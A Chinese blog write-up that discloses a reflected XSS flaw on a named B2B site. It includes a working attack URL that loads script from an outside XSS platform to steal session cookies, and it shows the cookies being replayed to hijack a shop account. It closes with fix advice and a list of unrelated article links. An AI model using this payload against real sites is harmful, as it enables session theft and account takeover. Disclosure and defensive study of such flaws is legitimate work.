[PoC]某B2B网站的一个反射型XSS漏洞
Author: Charlie
转载请注明出处。
工作过程纯粹手贱,测试了一下。然后发现了这么一个东西。有心利用能造成大范围影响。如可以自由修改用户信息。
漏洞存在文件:*.b2b.youboy.com/framephoto.html 【用户商铺的framephoto.html 文件均存在】
成因:没有对提交的参数 path 和 t 的值进行过滤就插入到网页。
漏洞证明:
看到这里,懂的同学就知道弹出那个框是什么意思了。不懂的继续往下看。看看它能干嘛。
先看下面一张图展示一个简单的攻击过程:
正常访问应该如图片中所示。提交用户名密码 -> 服务器验证成功设置SESSION、Cookie -> Cookie存活时间内再次访问后台无需登陆
这个时候恶意用户利用网页的漏洞,构造了一个特殊的URL发送给受害者,只要受害者访问后。Cookie 就被 恶意用户窃取。
然后用Cookie 去访问网站,这个时候网站就把恶意用户当做 已经登录的用户处理。返回正常的后台数据给恶意用户。
:D 很好玩的东西。下面我用我的一台VPS 当做受害者 , 我本机当做攻击者,展示一下利用过程。
首先我们先在VPS 上登录一个账户,假装是正常的用户,已经登陆了网站。如下:
这个时候我发送一条构造好的链接给他访问【为了方便我用XSS利用平台代码实现获取Cookie过程】。
http://hgskyt.b2b.youboy.com/framephoto.html?path=http://b2b.youboy.com/img/b1.jpg&t=<script src=http://ixss.in//4T2wES?1384675589></script>URL中参数”t“值为一段代码,作用是加载恶意JS,JS功能是获取Cookie,并传送去一个服务器上。
下面我就假装什么都不知道,在VPS上打开这个网址。如下图:
页面看起来很正常。实际VPS上的Cookie已经被上传到指定的地方了。如下图:
下面就让我们用这段Cookie在本地登录看看。看图:http://ww2.sinaimg.cn/mw690/9d3d6499gw1eao4yyc070g20hs0dchdt.gif
特地录了一段GIF。第一次我直接访问个人商铺后台,提示登录不成功。第二次,我拦截它发送的请求,然后把cookie替换成我们截取到的Cookie。
成功返回商铺的数据。
只要设置本地cookie为捕捉到的cookie,就可以登录对方商铺,为所欲为了。
假如利用JS自动进行POST数据修改 用户的商铺简介,再插入 恶意链接到页面。其它用户再点击,再感染,再传播。。。就有蠕虫的赶脚了。
修补:
1. 过滤特殊字符
2.可以考虑设置 httponly
测试环境:
本机 win8 64 + FireFox
VPS win2k3 32 + FireFox
之所以选用FireFox 是因为如Chrome 浏览器能拦截部分XSS,容易影响测试。如下:
并不是说漏洞不存在,只是它屏蔽了。
[PoC]某B2B网站的一个反射型XSS漏洞的更多相关文章
- [典型漏洞分享]从一个手动分析的反射型XSS漏洞看待一个安全设计原则【中危】
这是在测试YS“本地相册”功能时发现的一个反射型XSS,自己在安全测试过程中也发现过不少XSS漏洞,唯独这个的发现过程有点区别. 在此之前,我在测试另外一个模块的功能接口的时候发现了一个反射型XSS, ...
- 解决反射型XSS漏洞攻击
对于程序员来说安全防御,无非从两个方面考虑,要么前端要么后台. 一.首先从前端考虑过滤一些非法字符. 前端的主控js中,在<textarea> 输入框标签中,找到点击发送按钮后,追加到聊天 ...
- Wordpress Calendar Event Multi View < 1.4.01 反射型xss漏洞(CVE-2021-24498)
简介 WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台.该平台支持在PHP和MySQL的服务器上架设个人博客网站.WordPress 插件是WordPress开源的一个应 ...
- markdown反射型xss漏洞复现
markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到Hack ...
- Struts网站基于Filter的XSS漏洞修复
下面的代码只支持struts2框架中的xss漏洞 第一步,创建过滤器XssFilter : package com.ulic.ulcif.filter; import java.io.IOExcept ...
- 74CMS 3.4 反射型XSS漏洞
一. 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二.代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.4源代码编辑使用GBK编 ...
- 搜索框反射型xss问题解决(网站开发)
什么是反射型XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的h ...
- 反射型XSS的逆袭之路
0×00背景 这是一次结合各自技巧的渗透过程,由于原作者的截图不多,我们只是简单叙述一下思路~ 目标是一家本地的游戏公司,起因是找到一个反射型xss,但是却被对方公司忽略,而作者身边的一个妹子也在这家 ...
- 快速找出网站中可能存在的XSS漏洞实践
笔者写了一些XSS漏洞的挖掘过程记录下来,方便自己也方便他人. 一.背景 在本篇文章当中会一permeate生态测试系统为例,笔者此前写过一篇文章当中笔者已经讲解如何安装permeate渗透测试系统, ...
随机推荐
- UVa 1640 (计数) The Counting Problem
题意: 统计[a, b]或[b, a]中0~9这些数字各出现多少次. 分析: 这道题可以和UVa 11361比较来看. 同样是利用这样一个“模板”,进行区间的分块,加速运算. 因为这里没有前导0,所以 ...
- win7x64下的redis安装与使用
先引用百度百科的一段话吧,具体可以到百科查看吧. Redis是一个开源的使用ANSI C语言编写.支持网络.可基于内存亦可持久化的日志型.Key-Value数据库,并提供多种语言的API.从2010年 ...
- LeetCode Single Number II 单元素2
题意:给一个序列,其中只有1个元素只出现1次,其他的都一定出现3次.问这个出现一次的元素是多少? 思路: (1)全部元素拆成二进制,那么每个位上的1的个数应该是3的倍数,如果不是3的倍数,则ans的这 ...
- Java Socket(2): 异常处理
1 超时 套接字底层是基于TCP的,所以socket的超时和TCP超时是相同的.下面先讨论套接字读写缓冲区,接着讨论连接建立超时.读写超时以及JAVA套接字编程的嵌套异常捕获和一个超时例子程序的抓包示 ...
- POJ 1146 ID Codes (UVA146)
// 求下一个排列// 如果已经是最后一个排列// 就输出 No Successor// stl 或 自己写个 生成排列 我测试了下 两个速率是一样的.只是代码长度不同 /* #include < ...
- 【Unity3D】Unity自带组件—完成第一人称人物控制
1.导入unity自带的Character Controllers包 2.可以看到First Person Controller组件的构成 Mouse Look() : 随鼠标的移动而使所属物体发生旋 ...
- 【转】开始iOS 7中自动布局教程(一)
原文网址:http://www.cocoachina.com/industry/20131203/7462.html 原文:Beginning Auto Layout Tutorial in iOS ...
- oracle归档日志增长过快处理方法
oracle归档日志一般由dml语句产生,所以增加太快应该是dml太频繁 首先查询以下每天的归档产生的情况: SELECT TRUNC(FIRST_TIME) "TIME", SU ...
- 动态加载so文件
在开发过程中,经常会用到第三方库,比如地图.视频.文档编辑.图表之类.依赖这些库,需要添加其SDK,有时需要用到jni层的So文件,比如百度地图等. 那么问题来了,如果两个不同的库之间的so文件发生冲 ...
- 【转】android Apk打包过程概述_android是如何打包apk的
最近看了老罗分析android资源管理和apk打包流程的博客,参考其他一些资料,做了一下整理,脱离繁琐的打包细节和数据结构,从整体上概述了apk打包的整个流程. 流程概述: 1.打包资源文件,生成 ...